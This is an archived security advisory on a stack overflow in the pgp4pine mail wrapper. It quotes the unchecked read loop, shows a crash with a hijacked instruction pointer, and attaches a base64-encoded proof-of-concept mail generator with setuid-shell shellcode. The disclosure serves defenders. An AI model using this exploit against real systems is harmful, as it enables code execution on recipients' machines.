TUCoPS :: Linux :: Apps N-Z :: a6060.htm

pgp4pine stack overflow vulnerability
12th Mar 2003 [SBWID-6060]
COMMAND

	pgp4pine stack overflow vulnerability

SYSTEMS AFFECTED

	current ?

PROBLEM

	Eric Auge [eric.auge@cw.com] found :
	
	 I Background:
	
	pgp4pine is a mail encryption/decryption/signature/verification  wrapper
	to gpg for pine, it is called from pine to parse mail body and  get  PGP
	information from the file.
	
	 more information : http://pgp4pine.flatline.de/
	
	 II Problem description:
	
	When installed/configured within pine, pgp4pine parse any incoming  mail
	before reading (in the default standard configuration) looking  for  PGP
	tokens & informations to do his  sender's  signature  verifications.
	To verify incoming mail it calls :
	
	menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile);
	
	and read each line according to this loop :
	
	 [...]
	 char readline[CONSOLE_IO_LINE_LENGTH];
	 (where defines.h:#define CONSOLE_IO_LINE_LENGTH 256)
	 [...]
	 do {
	   fertig=0;
	   while (!fertig)
	   {
	     if ((c=getc(fin))==EOF)
	     {
	       outFile=inFile; /* this usually is not
	                          executed, EOF breaks directly */
	       return;
	     }
	     else if ((readline[i++]=c) == '\n')
	     {
	       readline[i]='\0';
	       fertig=1;
	     }
	   }
	   fertig=0;
	
	   if (strncmp("-----BEGIN PGP SIGNED",readline,20)==0)
	   {
	     /* got signed message */
	     fclose(fin);
	     while (fileVerify(inFile,outFile) > 0); /* =1: Repeat */
	     fertig=1;
	   }
	   else if (strncmp("-----BEGIN PGP",readline,14)==0)
	   {
	     /* got another type of PGP message (encrypted, keys ...) */
	     fclose(fin);
	     fileDecrypt(inFile,outFile);
	     waitForReturn();
	     fertig=1;
	   }
	   else
	     i=0; /* Got waste line, reset i */
	 } while (!fertig);
	 [...]
	
	If a single line go over 256 chars directly to EOF,  it  will  overwrite
	saved environnement on the stack and return, since there is no check  on
	the index 'i' within the readline[] array,
	
	     [...]
	     }
	     else if ((readline[i++]=c) == '\n')
	     {
	     [...]
	
	you can can go over CONSOLE_IO_LINE_LENGTH and replace  necessary  saved
	registers before hiting one condition to return.
	
	     [...]
	     if ((c=getc(fin))==EOF)
	     {
	       outFile=inFile; /* this usually is not
	                          executed, EOF breaks directly */
	       return;
	     }
	     [...]
	
	then try:
	
	rival@bones ~/dev/test/pgp4pine-ex $ echo `perl -e 'print "A"x500'` > testmail
	rival@bones ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
	[...]
	Segmentation fault (core dumped)
	rival@bones ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
	[...]
	Core was generated by `./pgp4pine-vuln -d -i testmail'.
	Program terminated with signal 11, Segmentation fault.
	Reading symbols from /lib/libc.so.6...done.
	Loaded symbols for /lib/libc.so.6
	Reading symbols from /lib/ld-linux.so.2...done.
	Loaded symbols for /lib/ld-linux.so.2
	#0  0x41414141 in ?? ()
	(gdb)
	
	Here it is ;)
	
	--0-784433148-1047484280=:99514
	Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="mailex-gen.c"
	Content-Transfer-Encoding: BASE64
	Content-ID: <20030312165120.O99514@eauge.fr.cw.net>
	Content-Description: mailex-gen.c
	Content-Disposition: ATTACHMENT; FILENAME="mailex-gen.c"
	
	DQovKiANCiAqICBtYWlsZXgtZ2VuLmMgLS0gUEdQNFBpbmUgZXhwbG9pdCBt
	YWlsIGdlbmVyYXRvciAtIHByb29mIG9mIGNvbmNlcHQgDQogKiAgQ29weXJp
	Z2h0IChDKSAyMDAzIC0gRXJpYyBBVUdFDQogKiAgDQogKiAgIFRoaXMgcHJv
	Z3JhbSBpcyBmcmVlIHNvZnR3YXJlOyB5b3UgY2FuIHJlZGlzdHJpYnV0ZSBp
	dCBhbmQvb3INCiAqICAgbW9kaWZ5IGl0IHVuZGVyIHRoZSB0ZXJtcyBvZiB0
	aGUgR05VIEdlbmVyYWwgUHVibGljIExpY2Vuc2UNCiAqICAgYXMgcHVibGlz
	aGVkIGJ5IHRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb247IGVpdGhlciB2
	ZXJzaW9uIDIgb2YNCiAqICAgdGhlIExpY2Vuc2Ugb3IgKGF0IHlvdXIgb3B0
	aW9uKSBhbnkgbGF0ZXIgdmVyc2lvbi4NCiAqDQogKiAgIFRoaXMgcHJvZ3Jh
	bSBpcyBkaXN0cmlidXRlZCBpbiB0aGUgaG9wZSB0aGF0IGl0IHdpbGwgYmUN
	CiAqICAgdXNlZnVsLCBidXQgV0lUSE9VVCBBTlkgV0FSUkFOVFk7IHdpdGhv
	dXQgZXZlbiB0aGUgaW1wbGllZA0KICogICB3YXJyYW50eQ0KICogICBvZiBN
	RVJDSEFOVEFCSUxJVFkgb3IgRklUTkVTUyBGT1IgQSBQQVJUSUNVTEFSIFBV
	UlBPU0UuICBTZWUgdGhlDQogKiAgIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNl
	bnNlIGZvciBtb3JlIGRldGFpbHMuDQogKg0KICogICBZb3Ugc2hvdWxkIGhh
	dmUgcmVjZWl2ZWQgYSBjb3B5IG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMN
	CiAqICAgTGljZW5zZQ0KICogICBhbG9uZyB3aXRoIHRoaXMgcHJvZ3JhbTsg
	aWYgbm90LCB3cml0ZSB0byB0aGUgRnJlZSBTb2Z0d2FyZQ0KICogICBGb3Vu
	ZGF0aW9uLCBJbmMuLCA1OSBUZW1wbGUgUGxhY2UsIFN1aXRlIDMzMCwgQm9z
	dG9uLCBNQQ0KICogICAwMjExMS0xMzA3DQogKiAgIFVTQQ0KICoNCiAqIGhv
	dyBwb2MgY29kZSB3b3JrcyA6IA0KICogICAkIGNwIC9iaW4vc2ggL3RtcC9z
	aA0KICogICAkIGxzIC1sIC90bXAvc2gNCiAqICAgLXJ3eHIteC0tLSAgICAx
	IHJpdmFsICAgIHVzZXJzICAgICAgNjgwMzA0IE1hciAxMiAxNToxNyAvdG1w
	L3NoDQogKiAgICQgLi9tYWlsZXgtZ2VuDQogKiAgIGVpcCAoaSB1c2UgcmVh
	ZGxpbmVbXSBhZGRyKTogMHhiZmZmZGJkMA0KICogICBub3cgdHlwZTogL3Bh
	dGgvdG8vcGdwNHBpbmUtdnVsbiAtZCAtaSAuL21haWxtZQ0KICogICAkIC9w
	YXRoL3RvL3BncDRwaW5lLXZ1bG4gLWQgLWkgLi9tYWlsbWUNCiAqICAgJCBs
	cyAtbCAvdG1wL3NoDQogKiAgIC1yd3NyLXhyLXggICAgMSByaXZhbCAgICB1
	c2VycyAgICAgIDY4MDMwNCBNYXIgMTIgMTU6MTcgL3RtcC9zaA0KICoNCiAq
	DQogKiAgIEVyaWMgQVVHRSA8ZWF1Z2VAZnIuY3cubmV0Pg0KICoNCiAqLw0K
	DQovKiANCiAqIE5PVEU6IEVJUCBpcyBoYXJkY29kZWQgcmVnYXJkaW5nIG15
	IG93biBzeXN0ZW0gYW5kIHRlc3RzLA0KICogICAgICAgdHVuZSBpdCBmb3Ig
	eW91ciBuZWVkcyA7KQ0KICovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2lu
	Y2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1
	ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1
	ZGUgPHN5cy9zdGF0Lmg+DQojaW5jbHVkZSA8ZmNudGwuaD4NCg0KI2RlZmlu
	ZSBNQVhMSU5FU0laRSAzMDENCiNkZWZpbmUgU0FWRURfRUlQIDB4YmZmZmRi
	ZDANCiNkZWZpbmUgTk9QIDB4OTANCiNkZWZpbmUgQUxJR04gMA0KI2RlZmlu
	ZSBYRklMRSAibWFpbG1lIg0KDQovKiBxdWljayBtYWRlIGNob3duIDQ3NTUg
	L3RtcC9zaCAqLw0KdW5zaWduZWQgY2hhciBzaGVsbGNvZGVbXSA9IA0KIlx4
	ZWJceDE0XHgzMVx4YzBceDM0XHgwZlx4NWJceDMxXHhjOVx4NjZceGI5XHhl
	ZFx4MDlceGNkXHg4MCINCiJceDMxXHhjMFx4NDBceDg5XHhjM1x4Y2RceDgw
	XHhlOFx4ZTdceGZmXHhmZlx4ZmYvdG1wL3NoIjsNCg0KaW50IG1haW4oaW50
	IGFyZ2MsIGNoYXIgKiphcmd2KSB7DQoNCiAgICBpbnQgaSxfc2Nfc2l6ZSxm
	ZDsNCiAgICB1bnNpZ25lZCBjaGFyIGJ1ZmZlcltNQVhMSU5FU0laRV0gPSAi
	XDAiOw0KICAgIGxvbmcgKnB0cjsNCiAgICBjaGFyICpjcHRyOw0KDQogICAg
	X3NjX3NpemUgPSBzaXplb2Yoc2hlbGxjb2RlKTsNCg0KICAgIHB0ciA9IChs
	b25nICopICZidWZmZXI7DQogICAgZnByaW50ZihzdGRlcnIsImVpcCAoaSB1
	c2UgcmVhZGxpbmVbXSBhZGRyKTogJXBcbiIsIFNBVkVEX0VJUCk7DQogICAg
	Zm9yIChpID0gMDsgaSA8IE1BWExJTkVTSVpFIDsgaSArPSA0KSB7DQoJKnB0
	cisrID0gU0FWRURfRUlQOw0KICAgIH0NCg0KICAgIGNwdHIgPSAoY2hhciAq
	KSAmYnVmZmVyOw0KICAgIGNwdHIgPSBjcHRyICsgTUFYTElORVNJWkUgLSA0
	NSAtIF9zY19zaXplOw0KDQogICAgZm9yICggaSA9IDA7IGkgPCBfc2Nfc2l6
	ZSA7IGkrKyApDQoJKmNwdHIrKyA9IHNoZWxsY29kZVtpXTsNCg0KICAgIGZv
	ciAoIGNwdHIgPSAoY2hhciAqKSAmYnVmZmVyIDsgY3B0ciA8ICgoY2hhciAq
	KWJ1ZmZlciArIE1BWExJTkVTSVpFIC0gNDUgLSBfc2Nfc2l6ZSkgOyBjcHRy
	KyspDQoJKmNwdHIgPSBOT1A7DQoNCiAgICAvKiBub3cgbGV0cyBjcmVhdGUg
	dGhlIGZpbGUgKi8NCiAgICBpZiAoIChmZCA9IG9wZW4oWEZJTEUsIE9fQ1JF
	QVR8T19XUk9OTFl8T19UUlVOQywgU19JUldYVXxTX0lSR1JQfFNfSVJPVEgp
	KSA9PSAtMSkgew0KCWZwcmludGYgKHN0ZGVyciwib3BlbigpIGZhaWxlZCFc
	biIpOw0KCWV4aXQoMSk7DQogICAgfQ0KICAgIHdyaXRlKGZkLCZidWZmZXIs
	c2l6ZW9mKGJ1ZmZlcikpOw0KICAgIGNsb3NlKGZkKTsNCiAgICBmcHJpbnRm
	KHN0ZGVyciwibm93IHR5cGU6IC9wYXRoL3RvL3BncDRwaW5lLXZ1bG4gLWQg
	LWkgLi9tYWlsbWVcbiIpOw0KCQ0KICAgIHJldHVybiAoMCk7DQp9DQo=
	
	--0-784433148-1047484280=:99514--
	
	 
	 III Impact
	
	Since pgp4pine process  any  incoming  email,  sending  special  crafted
	email can make sender execute arbitrary code on the recipient  box  when
	the mail is opened.

SOLUTION

	?

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH